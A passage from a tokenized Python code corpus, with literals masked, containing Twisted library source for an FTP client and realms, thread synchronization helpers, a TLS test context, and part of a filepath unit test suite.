) ) <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" ) <EOL> class FTPRealm ( BaseFTPRealm ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , anonymousRoot , userHome = '<STR_LIT>' ) : <EOL> BaseFTPRealm . __init__ ( self , anonymousRoot ) <EOL> self . userHome = filepath . FilePath ( userHome ) <EOL> def getHomeDirectory ( self , avatarId ) : <EOL> """<STR_LIT>""" <EOL> return self . userHome . child ( avatarId ) <EOL> class SystemFTPRealm ( BaseFTPRealm ) : <EOL> """<STR_LIT>""" <EOL> def getHomeDirectory ( self , avatarId ) : <EOL> """<STR_LIT>""" <EOL> path = os . path . expanduser ( '<STR_LIT>' + avatarId ) <EOL> if path . startswith ( '<STR_LIT>' ) : <EOL> raise cred_error . UnauthorizedLogin ( ) <EOL> return filepath . FilePath ( path ) <EOL> class ConnectionLost ( FTPError ) : <EOL> pass <EOL> class CommandFailed ( FTPError ) : <EOL> pass <EOL> class BadResponse ( FTPError ) : <EOL> pass <EOL> class UnexpectedResponse ( FTPError ) : <EOL> pass <EOL> class UnexpectedData ( FTPError ) : <EOL> pass <EOL> class FTPCommand : <EOL> def __init__ ( self , text = None , public = <NUM_LIT:0> ) : <EOL> self . text = text <EOL> self . deferred = defer . Deferred ( ) <EOL> self . ready = <NUM_LIT:1> <EOL> self . public = public <EOL> self . transferDeferred = None <EOL> def fail ( self , failure ) : <EOL> if self . public : <EOL> self . deferred . errback ( failure ) <EOL> class ProtocolWrapper ( protocol . Protocol ) : <EOL> def __init__ ( self , original , deferred ) : <EOL> self . original = original <EOL> self . deferred = deferred <EOL> def makeConnection ( self , transport ) : <EOL> self . original . makeConnection ( transport ) <EOL> def dataReceived ( self , data ) : <EOL> self . original . dataReceived ( data ) <EOL> def connectionLost ( self , reason ) : <EOL> self . original . connectionLost ( reason ) <EOL> self . deferred . callback ( None ) <EOL> class IFinishableConsumer ( interfaces . IConsumer ) : <EOL> """<STR_LIT>""" <EOL> def finish ( ) : <EOL> """<STR_LIT>""" <EOL> class SenderProtocol ( protocol . Protocol ) : <EOL> implements ( IFinishableConsumer ) <EOL> def __init__ ( self ) : <EOL> self . connectedDeferred = defer . Deferred ( ) <EOL> self . deferred = defer . Deferred ( ) <EOL> def dataReceived ( self , data ) : <EOL> raise UnexpectedData ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def makeConnection ( self , transport ) : <EOL> protocol . Protocol . makeConnection ( self , transport ) <EOL> self . connectedDeferred . callback ( self ) <EOL> def connectionLost ( self , reason ) : <EOL> if reason . check ( error . ConnectionDone ) : <EOL> self . deferred . callback ( '<STR_LIT>' ) <EOL> else : <EOL> self . deferred . errback ( reason ) <EOL> def write ( self , data ) : <EOL> self . transport . write ( data ) <EOL> def registerProducer ( self , producer , streaming ) : <EOL> """<STR_LIT>""" <EOL> self . transport . registerProducer ( producer , streaming ) <EOL> def unregisterProducer ( self ) : <EOL> """<STR_LIT>""" <EOL> self . transport . unregisterProducer ( ) <EOL> def finish ( self ) : <EOL> self . transport . loseConnection ( ) <EOL> def decodeHostPort ( line ) : <EOL> """<STR_LIT>""" <EOL> abcdef = re . sub ( '<STR_LIT>' , '<STR_LIT>' , line ) <EOL> parsed = [ int ( p . strip ( ) ) for p in abcdef . split ( '<STR_LIT:U+002C>' ) ] <EOL> for x in parsed : <EOL> if x < <NUM_LIT:0> or x > <NUM_LIT:255> : <EOL> raise ValueError ( "<STR_LIT>" , line , x ) <EOL> a , b , c , d , e , f = parsed <EOL> host = "<STR_LIT>" % ( a , b , c , d ) <EOL> port = ( int ( e ) << <NUM_LIT:8> ) + int ( f ) <EOL> return host , port <EOL> def encodeHostPort ( host , port ) : <EOL> numbers = host . split ( '<STR_LIT:.>' ) + [ str ( port >> <NUM_LIT:8> ) , str ( port % <NUM_LIT> ) ] <EOL> return '<STR_LIT:U+002C>' . join ( numbers ) <EOL> def _unwrapFirstError ( failure ) : <EOL> failure . trap ( defer . FirstError ) <EOL> return failure . value . subFailure <EOL> class FTPDataPortFactory ( protocol . ServerFactory ) : <EOL> """<STR_LIT>""" <EOL> noisy = <NUM_LIT:0> <EOL> def buildProtocol ( self , addr ) : <EOL> self . protocol . factory = self <EOL> self . port . loseConnection ( ) <EOL> return self . protocol <EOL> class FTPClientBasic ( basic . LineReceiver ) : <EOL> """<STR_LIT>""" <EOL> debug = False <EOL> def __init__ ( self ) : <EOL> self . actionQueue = [ ] <EOL> self . greeting = None <EOL> self . nextDeferred = defer . Deferred ( ) . addCallback ( self . _cb_greeting ) <EOL> self . nextDeferred . addErrback ( self . fail ) <EOL> self . response = [ ] <EOL> self . _failed = <NUM_LIT:0> <EOL> def fail ( self , error ) : <EOL> """<STR_LIT>""" <EOL> self . _fail ( error ) <EOL> def _fail ( self , error ) : <EOL> """<STR_LIT>""" <EOL> if self . _failed : <EOL> return error <EOL> self . _failed = <NUM_LIT:1> <EOL> if self . nextDeferred : <EOL> try : <EOL> self . nextDeferred . errback ( failure . Failure ( ConnectionLost ( '<STR_LIT>' , error ) ) ) <EOL> except defer . AlreadyCalledError : <EOL> pass <EOL> for ftpCommand in self . actionQueue : <EOL> ftpCommand . fail ( failure . Failure ( ConnectionLost ( '<STR_LIT>' , error ) ) ) <EOL> return error <EOL> def _cb_greeting ( self , greeting ) : <EOL> self . greeting = greeting <EOL> def sendLine ( self , line ) : <EOL> """<STR_LIT>""" <EOL> if line is None : <EOL> return <EOL> basic . LineReceiver . sendLine ( self , line ) <EOL> def sendNextCommand ( self ) : <EOL> """<STR_LIT>""" <EOL> ftpCommand = self . popCommandQueue ( ) <EOL> if ftpCommand is None : <EOL> self . nextDeferred = None <EOL> return <EOL> if not ftpCommand . ready : <EOL> self . actionQueue . insert ( <NUM_LIT:0> , ftpCommand ) <EOL> reactor . callLater ( <NUM_LIT:1.0> , self . sendNextCommand ) <EOL> self . nextDeferred = None <EOL> return <EOL> if ftpCommand . text == '<STR_LIT>' : <EOL> self . generatePortCommand ( ftpCommand ) <EOL> if self . debug : <EOL> log . msg ( '<STR_LIT>' % ftpCommand . text ) <EOL> self . nextDeferred = ftpCommand . deferred <EOL> self . sendLine ( ftpCommand . text ) <EOL> def queueCommand ( self , ftpCommand ) : <EOL> """<STR_LIT>""" <EOL> self . actionQueue . append ( ftpCommand ) <EOL> if ( len ( self . actionQueue ) == <NUM_LIT:1> and self . transport is not None and <EOL> self . nextDeferred is None ) : <EOL> self . sendNextCommand ( ) <EOL> def queueStringCommand ( self , command , public = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> ftpCommand = FTPCommand ( command , public ) <EOL> self . queueCommand ( ftpCommand ) <EOL> return ftpCommand . deferred <EOL> def popCommandQueue ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . actionQueue : <EOL> return self . actionQueue . pop ( <NUM_LIT:0> ) <EOL> else : <EOL> return None <EOL> def queueLogin ( self , username , password ) : <EOL> """<STR_LIT>""" <EOL> deferreds = [ ] <EOL> userDeferred = self . queueStringCommand ( '<STR_LIT>' + username , public = <NUM_LIT:0> ) <EOL> deferreds . append ( userDeferred ) <EOL> if password is not None : <EOL> passwordCmd = FTPCommand ( '<STR_LIT>' + password , public = <NUM_LIT:0> ) <EOL> self . queueCommand ( passwordCmd ) <EOL> deferreds . append ( passwordCmd . deferred ) <EOL> def cancelPasswordIfNotNeeded ( response ) : <EOL> if response [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> self . actionQueue . remove ( passwordCmd ) <EOL> return response <EOL> userDeferred . addCallback ( cancelPasswordIfNotNeeded ) <EOL> for deferred in deferreds : <EOL> deferred . addErrback ( self . fail ) <EOL> deferred . addErrback ( lambda x : None ) <EOL> def lineReceived ( self , line ) : <EOL> """<STR_LIT>""" <EOL> if self . debug : <EOL> log . msg ( '<STR_LIT>' % line ) <EOL> self . response . append ( line ) <EOL> codeIsValid = re . match ( r'<STR_LIT>' , line ) <EOL> if not codeIsValid : <EOL> return <EOL> code = line [ <NUM_LIT:0> : <NUM_LIT:3> ] <EOL> if code [ <NUM_LIT:0> ] == '<STR_LIT:1>' : <EOL> return <EOL> if self . nextDeferred is None : <EOL> self . fail ( UnexpectedResponse ( self . response ) ) <EOL> return <EOL> response = self . response <EOL> self . response = [ ] <EOL> if code [ <NUM_LIT:0> ] in ( '<STR_LIT:2>' , '<STR_LIT:3>' ) : <EOL> self . nextDeferred . callback ( response ) <EOL> elif code [ <NUM_LIT:0> ] in ( '<STR_LIT:4>' , '<STR_LIT:5>' ) : <EOL> self . nextDeferred . errback ( failure . Failure ( CommandFailed ( response ) ) ) <EOL> else : <EOL> log . msg ( '<STR_LIT>' % ( code , ) ) <EOL> self . nextDeferred . errback ( failure . Failure ( BadResponse ( response ) ) ) <EOL> self . sendNextCommand ( ) <EOL> def connectionLost ( self , reason ) : <EOL> self . _fail ( reason ) <EOL> class _PassiveConnectionFactory ( protocol . ClientFactory ) : <EOL> noisy = False <EOL> def __init__ ( self , protoInstance ) : <EOL> self . protoInstance = protoInstance <EOL> def buildProtocol ( self , ignored ) : <EOL> self . protoInstance . factory = self <EOL> return self . protoInstance <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> e = FTPError ( '<STR_LIT>' , reason ) <EOL> self . protoInstance . deferred . errback ( e ) <EOL> class FTPClient ( FTPClientBasic ) : <EOL> """<STR_LIT>""" <EOL> connectFactory = reactor . connectTCP <EOL> def __init__ ( self , username = '<STR_LIT>' , <EOL> password = '<STR_LIT>' , <EOL> passive = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> FTPClientBasic . __init__ ( self ) <EOL> self . queueLogin ( username , password ) <EOL> self . passive = passive <EOL> def fail ( self , error ) : <EOL> """<STR_LIT>""" <EOL> self . transport . loseConnection ( ) <EOL> self . _fail ( error ) <EOL> def receiveFromConnection ( self , commands , protocol ) : <EOL> """<STR_LIT>""" <EOL> protocol = interfaces . IProtocol ( protocol ) <EOL> wrapper = ProtocolWrapper ( protocol , defer . Deferred ( ) ) <EOL> return self . _openDataConnection ( commands , wrapper ) <EOL> def queueLogin ( self , username , password ) : <EOL> """<STR_LIT>""" <EOL> FTPClientBasic . queueLogin ( self , username , password ) <EOL> d = self . queueStringCommand ( '<STR_LIT>' , public = <NUM_LIT:0> ) <EOL> d . addErrback ( self . fail ) <EOL> d . addErrback ( lambda x : None ) <EOL> def sendToConnection ( self , commands ) : <EOL> """<STR_LIT>""" <EOL> s = SenderProtocol ( ) <EOL> r = self . _openDataConnection ( commands , s ) <EOL> return ( s . connectedDeferred , r ) <EOL> def _openDataConnection ( self , commands , protocol ) : <EOL> """<STR_LIT>""" <EOL> cmds = [ FTPCommand ( command , public = <NUM_LIT:1> ) for command in commands ] <EOL> cmdsDeferred = defer . DeferredList ( [ cmd . deferred for cmd in cmds ] , <EOL> fireOnOneErrback = True , consumeErrors = True ) <EOL> cmdsDeferred . addErrback ( _unwrapFirstError ) <EOL> if self . passive : <EOL> _mutable = [ None ] <EOL> def doPassive ( response ) : <EOL> """<STR_LIT>""" <EOL> host , port = decodeHostPort ( response [ - <NUM_LIT:1> ] [ <NUM_LIT:4> : ] ) <EOL> f = _PassiveConnectionFactory ( protocol ) <EOL> _mutable [ <NUM_LIT:0> ] = self . connectFactory ( host , port , f ) <EOL> pasvCmd = FTPCommand ( '<STR_LIT>' ) <EOL> self . queueCommand ( pasvCmd ) <EOL> pasvCmd . deferred . addCallback ( doPassive ) . addErrback ( self . fail ) <EOL> results = [ cmdsDeferred , pasvCmd . deferred , protocol . deferred ] <EOL> d = defer . DeferredList ( results , fireOnOneErrback = True , consumeErrors = True ) <EOL> d . addErrback ( _unwrapFirstError ) <EOL> def close ( x , m = _mutable ) : <EOL> m [ <NUM_LIT:0> ] and m [ <NUM_LIT:0> ] . disconnect ( ) <EOL> return x <EOL> d . addBoth ( close ) <EOL> else : <EOL> portCmd = FTPCommand ( '<STR_LIT>' ) <EOL> portCmd . transferDeferred = protocol . deferred <EOL> portCmd . protocol = protocol <EOL> portCmd . deferred . addErrback ( portCmd . transferDeferred . errback ) <EOL> self . queueCommand ( portCmd ) <EOL> portCmd . loseConnection = lambda result : result <EOL> portCmd . fail = lambda error : error <EOL> cmdsDeferred . addErrback ( lambda e , pc = portCmd : pc . fail ( e ) or e ) <EOL> results = [ cmdsDeferred , portCmd . deferred , portCmd . transferDeferred ] <EOL> d = defer . DeferredList ( results , fireOnOneErrback = True , consumeErrors = True ) <EOL> d . addErrback ( _unwrapFirstError ) <EOL> for cmd in cmds : <EOL> self . queueCommand ( cmd ) <EOL> return d <EOL> def generatePortCommand ( self , portCmd ) : <EOL> """<STR_LIT>""" <EOL> factory = FTPDataPortFactory ( ) <EOL> factory . protocol = portCmd . protocol <EOL> listener = reactor . listenTCP ( <NUM_LIT:0> , factory ) <EOL> factory . port = listener <EOL> def listenerFail ( error , listener = listener ) : <EOL> if listener . connected : <EOL> listener . loseConnection ( ) <EOL> return error <EOL> portCmd . fail = listenerFail <EOL> host = self . transport . getHost ( ) . host <EOL> port = listener . getHost ( ) . port <EOL> portCmd . text = '<STR_LIT>' + encodeHostPort ( host , port ) <EOL> def escapePath ( self , path ) : <EOL> """<STR_LIT>""" <EOL> return path . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> def retrieveFile ( self , path , protocol , offset = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> cmds = [ '<STR_LIT>' + self . escapePath ( path ) ] <EOL> if offset : <EOL> cmds . insert ( <NUM_LIT:0> , ( '<STR_LIT>' + str ( offset ) ) ) <EOL> return self . receiveFromConnection ( cmds , protocol ) <EOL> retr = retrieveFile <EOL> def storeFile ( self , path , offset = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> cmds = [ '<STR_LIT>' + self . escapePath ( path ) ] <EOL> if offset : <EOL> cmds . insert ( <NUM_LIT:0> , ( '<STR_LIT>' + str ( offset ) ) ) <EOL> return self . sendToConnection ( cmds ) <EOL> stor = storeFile <EOL> def rename ( self , pathFrom , pathTo ) : <EOL> """<STR_LIT>""" <EOL> renameFrom = self . queueStringCommand ( '<STR_LIT>' + self . escapePath ( pathFrom ) ) <EOL> renameTo = self . queueStringCommand ( '<STR_LIT>' + self . escapePath ( pathTo ) ) <EOL> fromResponse = [ ] <EOL> result = defer . Deferred ( ) <EOL> result . addCallback ( lambda toResponse : ( fromResponse , toResponse ) ) <EOL> def ebFrom ( failure ) : <EOL> self . popCommandQueue ( ) <EOL> result . errback ( failure ) <EOL> renameFrom . addCallbacks ( fromResponse . extend , ebFrom ) <EOL> renameTo . chainDeferred ( result ) <EOL> return result <EOL> def list ( self , path , protocol ) : <EOL> """<STR_LIT>""" <EOL> if path is None : <EOL> path = '<STR_LIT>' <EOL> return self . receiveFromConnection ( [ '<STR_LIT>' + self . escapePath ( path ) ] , protocol ) <EOL> def nlst ( self , path , protocol ) : <EOL> """<STR_LIT>""" <EOL> if path is None : <EOL> path = '<STR_LIT>' <EOL> return self . receiveFromConnection ( [ '<STR_LIT>' + self . escapePath ( path ) ] , protocol ) <EOL> def cwd ( self , path ) : <EOL> """<STR_LIT>""" <EOL> return self . queueStringCommand ( '<STR_LIT>' + self . escapePath ( path ) ) <EOL> def makeDirectory ( self , path ) : <EOL> """<STR_LIT>""" <EOL> return self . queueStringCommand ( '<STR_LIT>' + self . escapePath ( path ) ) <EOL> def removeFile ( self , path ) : <EOL> """<STR_LIT>""" <EOL> return self . queueStringCommand ( '<STR_LIT>' + self . escapePath ( path ) ) <EOL> def removeDirectory ( self , path ) : <EOL> """<STR_LIT>""" <EOL> return self . queueStringCommand ( '<STR_LIT>' + self . escapePath ( path ) ) <EOL> def cdup ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . queueStringCommand ( '<STR_LIT>' ) <EOL> def pwd ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . queueStringCommand ( '<STR_LIT>' ) <EOL> def getDirectory ( self ) : <EOL> """<STR_LIT>""" <EOL> def cbParse ( result ) : <EOL> try : <EOL> if int ( result [ <NUM_LIT:0> ] . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] ) != <NUM_LIT> : <EOL> raise ValueError <EOL> except ( IndexError , ValueError ) : <EOL> return failure . Failure ( CommandFailed ( result ) ) <EOL> path = parsePWDResponse ( result [ <NUM_LIT:0> ] ) <EOL> if path is None : <EOL> return failure . Failure ( CommandFailed ( result ) ) <EOL> return path <EOL> return self . pwd ( ) . addCallback ( cbParse ) <EOL> def quit ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . queueStringCommand ( '<STR_LIT>' ) <EOL> class FTPFileListProtocol ( basic . LineReceiver ) : <EOL> """<STR_LIT>""" <EOL> fileLinePattern = re . compile ( <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> ) <EOL> delimiter = '<STR_LIT:\n>' <EOL> def __init__ ( self ) : <EOL> self . files = [ ] <EOL> def lineReceived ( self , line ) : <EOL> d = self . parseDirectoryLine ( line ) <EOL> if d is None : <EOL> self . unknownLine ( line ) <EOL> else : <EOL> self . addFile ( d ) <EOL> def parseDirectoryLine ( self , line ) : <EOL> """<STR_LIT>""" <EOL> match = self . fileLinePattern . match ( line ) <EOL> if match is None : <EOL> return None <EOL> else : <EOL> d = match . groupdict ( ) <EOL> d [ '<STR_LIT:filename>' ] = d [ '<STR_LIT:filename>' ] . replace ( r'<STR_LIT>' , '<STR_LIT:U+0020>' ) <EOL> d [ '<STR_LIT>' ] = int ( d [ '<STR_LIT>' ] ) <EOL> d [ '<STR_LIT:size>' ] = int ( d [ '<STR_LIT:size>' ] ) <EOL> if d [ '<STR_LIT>' ] : <EOL> d [ '<STR_LIT>' ] = d [ '<STR_LIT>' ] . replace ( r'<STR_LIT>' , '<STR_LIT:U+0020>' ) <EOL> return d <EOL> def addFile ( self , info ) : <EOL> """<STR_LIT>""" <EOL> self . files . append ( info ) <EOL> def unknownLine ( self , line ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def parsePWDResponse ( response ) : <EOL> """<STR_LIT>""" <EOL> match = re . search ( '<STR_LIT>' , response ) <EOL> if match : <EOL> return match . groups ( ) [ <NUM_LIT:0> ] <EOL> else : <EOL> return None </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> from functools import wraps <EOL> class DummyLock ( object ) : <EOL> """<STR_LIT>""" <EOL> def __reduce__ ( self ) : <EOL> return ( unpickle_lock , ( ) ) <EOL> def unpickle_lock ( ) : <EOL> if threadingmodule is not None : <EOL> return XLock ( ) <EOL> else : <EOL> return DummyLock ( ) <EOL> unpickle_lock . __safe_for_unpickling__ = True <EOL> def _synchPre ( self ) : <EOL> if '<STR_LIT>' not in self . __dict__ : <EOL> _synchLockCreator . acquire ( ) <EOL> if '<STR_LIT>' not in self . __dict__ : <EOL> self . __dict__ [ '<STR_LIT>' ] = XLock ( ) <EOL> _synchLockCreator . release ( ) <EOL> self . _threadable_lock . acquire ( ) <EOL> def _synchPost ( self ) : <EOL> self . _threadable_lock . release ( ) <EOL> def _sync ( klass , function ) : <EOL> @ wraps ( function ) <EOL> def sync ( self , * args , ** kwargs ) : <EOL> _synchPre ( self ) <EOL> try : <EOL> return function ( self , * args , ** kwargs ) <EOL> finally : <EOL> _synchPost ( self ) <EOL> return sync <EOL> def synchronize ( * klasses ) : <EOL> """<STR_LIT>""" <EOL> if threadingmodule is not None : <EOL> for klass in klasses : <EOL> for methodName in klass . synchronized : <EOL> sync = _sync ( klass , klass . __dict__ [ methodName ] ) <EOL> setattr ( klass , methodName , sync ) <EOL> def init ( with_threads = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> global threaded , _synchLockCreator , XLock <EOL> if with_threads : <EOL> if not threaded : <EOL> if threadingmodule is not None : <EOL> threaded = True <EOL> class XLock ( threadingmodule . _RLock , object ) : <EOL> def __reduce__ ( self ) : <EOL> return ( unpickle_lock , ( ) ) <EOL> _synchLockCreator = XLock ( ) <EOL> else : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> else : <EOL> if threaded : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> else : <EOL> pass <EOL> _dummyID = object ( ) <EOL> def getThreadID ( ) : <EOL> if threadingmodule is None : <EOL> return _dummyID <EOL> return threadingmodule . currentThread ( ) . ident <EOL> def isInIOThread ( ) : <EOL> """<STR_LIT>""" <EOL> return ioThread == getThreadID ( ) <EOL> def registerAsIOThread ( ) : <EOL> """<STR_LIT>""" <EOL> global ioThread <EOL> ioThread = getThreadID ( ) <EOL> ioThread = None <EOL> threaded = False <EOL> try : <EOL> import threading as threadingmodule <EOL> except ImportError : <EOL> threadingmodule = None <EOL> else : <EOL> init ( True ) <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> from twisted . python . compat import nativeString <EOL> from twisted . internet import ssl <EOL> from twisted . python . filepath import FilePath <EOL> from OpenSSL import SSL <EOL> certPath = nativeString ( FilePath ( __file__ . encode ( "<STR_LIT:utf-8>" ) <EOL> ) . sibling ( b"<STR_LIT>" ) . path ) <EOL> class ClientTLSContext ( ssl . ClientContextFactory ) : <EOL> isClient = <NUM_LIT:1> <EOL> def getContext ( self ) : <EOL> return SSL . Context ( SSL . TLSv1_METHOD ) <EOL> class ServerTLSContext : <EOL> isClient = <NUM_LIT:0> <EOL> def __init__ ( self , filename = certPath ) : <EOL> self . filename = filename <EOL> def getContext ( self ) : <EOL> ctx = SSL . Context ( SSL . TLSv1_METHOD ) <EOL> ctx . use_certificate_file ( self . filename ) <EOL> ctx . use_privatekey_file ( self . filename ) <EOL> return ctx </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> import os , time , pickle , errno , stat <EOL> import contextlib <EOL> from pprint import pformat <EOL> from twisted . python . compat import _PY3 <EOL> from twisted . python . win32 import WindowsError , ERROR_DIRECTORY <EOL> from twisted . python import filepath <EOL> from twisted . python . runtime import platform <EOL> from twisted . trial . unittest import SkipTest , SynchronousTestCase as TestCase <EOL> from zope . interface . verify import verifyObject <EOL> class BytesTestCase ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def mktemp ( self ) : <EOL> """<STR_LIT>""" <EOL> return TestCase . mktemp ( self ) . encode ( "<STR_LIT:utf-8>" ) <EOL> class AbstractFilePathTestCase ( BytesTestCase ) : <EOL> """<STR_LIT>""" <EOL> f1content = b"<STR_LIT>" <EOL> f2content = b"<STR_LIT>" <EOL> def _mkpath ( self , * p ) : <EOL> x = os . path . abspath ( os . path . join ( self . cmn , * p ) ) <EOL> self . all . append ( x ) <EOL> return x <EOL> def subdir ( self , * dirname ) : <EOL> os . mkdir ( self . _mkpath ( * dirname ) ) <EOL> def subfile ( self , * dirname ) : <EOL> return open ( self . _mkpath ( * dirname ) , "<STR_LIT:wb>" ) <EOL> def setUp ( self ) : <EOL> self . now = time . time ( ) <EOL> cmn = self . cmn = os . path . abspath ( self . mktemp ( ) ) <EOL> self . all = [ cmn ] <EOL> os . mkdir ( cmn ) <EOL> self . subdir ( b"<STR_LIT>" ) <EOL> f = self . subfile ( b"<STR_LIT>" ) <EOL> f . write ( self . f1content ) <EOL> f . close ( ) <EOL> f = self . subfile ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> f . write ( self . f2content ) <EOL> f . close ( ) <EOL> self . subdir ( b'<STR_LIT>' ) <EOL> f = self . subfile ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> f . close ( ) <EOL> f = self . subfile ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> f . close ( ) <EOL> f = self . subfile ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> f . close ( ) <EOL> self . path = filepath . FilePath ( cmn ) <EOL> self . root = filepath . FilePath ( b"<STR_LIT:/>" ) <EOL> def test_verifyObject ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( verifyObject ( filepath . IFilePath , self . path ) ) <EOL> def test_segmentsFromPositive ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> self . path . child ( b"<STR_LIT:a>" ) . child ( b"<STR_LIT:b>" ) . child ( b"<STR_LIT:c>" ) . segmentsFrom ( self . path ) , <EOL> [ b"<STR_LIT:a>" , b"<STR_LIT:b>" , b"<STR_LIT:c>" ] ) <EOL> def test_segmentsFromNegative ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> ValueError , <EOL> self . path . child ( b"<STR_LIT:a>" ) . child ( b"<STR_LIT:b>" ) . child ( b"<STR_LIT:c>" ) . segmentsFrom , <EOL> self . path . child ( b"<STR_LIT:d>" ) . child ( b"<STR_LIT:c>" ) . child ( b"<STR_LIT:e>" ) ) <EOL> def test_walk ( self ) : <EOL> """<STR_LIT>""" <EOL> x = [ foo . path for foo in self . path . walk ( ) ] <EOL> self . assertEqual ( set ( x ) , set ( self . all ) ) <EOL> def test_parents ( self ) : <EOL> """<STR_LIT>""" <EOL> L = [ ] <EOL> pathobj = self . path . child ( b"<STR_LIT:a>" ) . child ( b"<STR_LIT:b>" ) . child ( b"<STR_LIT:c>" ) <EOL> fullpath = pathobj . path <EOL> lastpath = fullpath <EOL> thispath = os . path . dirname ( fullpath ) <EOL> while lastpath != self . root . path : <EOL> L . append ( thispath ) <EOL> lastpath = thispath <EOL> thispath = os . path . dirname ( thispath ) <EOL> self . assertEqual ( [ x . path for x in pathobj . parents ( ) ] , L ) <EOL> def test_validSubdir ( self ) : <EOL> """<STR_LIT>""" <EOL> sub1 = self . path . child ( b'<STR_LIT>' ) <EOL> self . failUnless ( sub1 . exists ( ) , <EOL> "<STR_LIT>" ) <EOL> self . failUnless ( sub1 . isdir ( ) , <EOL> "<STR_LIT>" ) <EOL> self . failUnless ( not sub1 . isfile ( ) , <EOL> "<STR_LIT>" ) <EOL> self . failUnless ( not sub1 . islink ( ) , <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( sub1 . listdir ( ) , <EOL> [ b'<STR_LIT>' ] ) <EOL> def test_invalidSubdir ( self ) : <EOL> """<STR_LIT>""" <EOL> sub2 = self . path . child ( b'<STR_LIT>' ) <EOL> self . failIf ( sub2 . exists ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_validFiles ( self ) : <EOL> """<STR_LIT>""" <EOL> f1 = self . path . child ( b'<STR_LIT>' ) <EOL> with contextlib . closing ( f1 . open ( ) ) as f : <EOL> self . assertEqual ( f . read ( ) , self . f1content ) <EOL> f2 = self . path . child ( b'<STR_LIT>' ) . child ( b'<STR_LIT>' ) <EOL> with contextlib . closing ( f2 . open ( ) ) as f : <EOL> self . assertEqual ( f . read ( ) , self . f2content ) <EOL> def test_multipleChildSegments ( self ) : <EOL> """<STR_LIT>""" <EOL> multiple = self . path . descendant ( [ b'<STR_LIT:a>' , b'<STR_LIT:b>' , b'<STR_LIT:c>' ] ) <EOL> single = self . path . child ( b'<STR_LIT:a>' ) . child ( b'<STR_LIT:b>' ) . child ( b'<STR_LIT:c>' ) <EOL> self . assertEqual ( multiple , single ) <EOL> def test_dictionaryKeys ( self ) : <EOL> """<STR_LIT>""" <EOL> f1 = self . path . child ( b'<STR_LIT>' ) <EOL> f1prime = self . path . child ( b'<STR_LIT>' ) <EOL> f2 = self . path . child ( b'<STR_LIT>' ) <EOL> dictoid = { } <EOL> dictoid [ f1 ] = <NUM_LIT:3> <EOL> dictoid [ f1prime ] = <NUM_LIT:4> <EOL> self . assertEqual ( dictoid [ f1 ] , <NUM_LIT:4> ) <EOL> self . assertEqual ( list ( dictoid . keys ( ) ) , [ f1 ] ) <EOL> self . assertTrue ( list ( dictoid . keys ( ) ) [ <NUM_LIT:0> ] is f1 ) <EOL> self . assertFalse ( list ( dictoid . keys ( ) ) [ <NUM_LIT:0> ] is f1prime ) <EOL> dictoid [ f2 ] = <NUM_LIT:5> <EOL> self . assertEqual ( dictoid [ f2 ] , <NUM_LIT:5> ) <EOL> self . assertEqual ( len ( dictoid ) , <NUM_LIT:2> ) <EOL> def test_dictionaryKeyWithString ( self ) : <EOL> """<STR_LIT>""" <EOL> f1 = self . path . child ( b'<STR_LIT>' ) <EOL> dictoid = { f1 : '<STR_LIT:hello>' } <EOL> dictoid [ f1 . path ] = '<STR_LIT>' <EOL> self . assertEqual ( len ( dictoid ) , <NUM_LIT:2> ) <EOL> def test_childrenNonexistentError ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( filepath . UnlistableError , <EOL> self . path . child ( b'<STR_LIT>' ) . children ) <EOL> def test_childrenNotDirectoryError ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( filepath . UnlistableError , <EOL> self . path . child ( b'<STR_LIT>' ) . children ) <EOL> def test_newTimesAreFloats ( self ) : <EOL> """<STR_LIT>""" <EOL> for p in self . path , self . path . child ( b'<STR_LIT>' ) : <EOL> self . assertEqual ( type ( p . getAccessTime ( ) ) , float ) <EOL> self . assertEqual ( type ( p . getModificationTime ( ) ) , float ) <EOL> self . assertEqual ( type ( p . getStatusChangeTime ( ) ) , float ) <EOL> def test_oldTimesAreInts ( self ) : <EOL> """<STR_LIT>""" <EOL> for p in self . path , self . path . child ( b'<STR_LIT>' ) : <EOL> self . assertEqual ( type ( p . getatime ( ) ) , int ) <EOL> self . assertEqual ( type ( p . getmtime ( ) ) , int ) <EOL> self . assertEqual ( type ( p . getctime ( ) ) , int ) <EOL> class FakeWindowsPath ( filepath . FilePath ) : 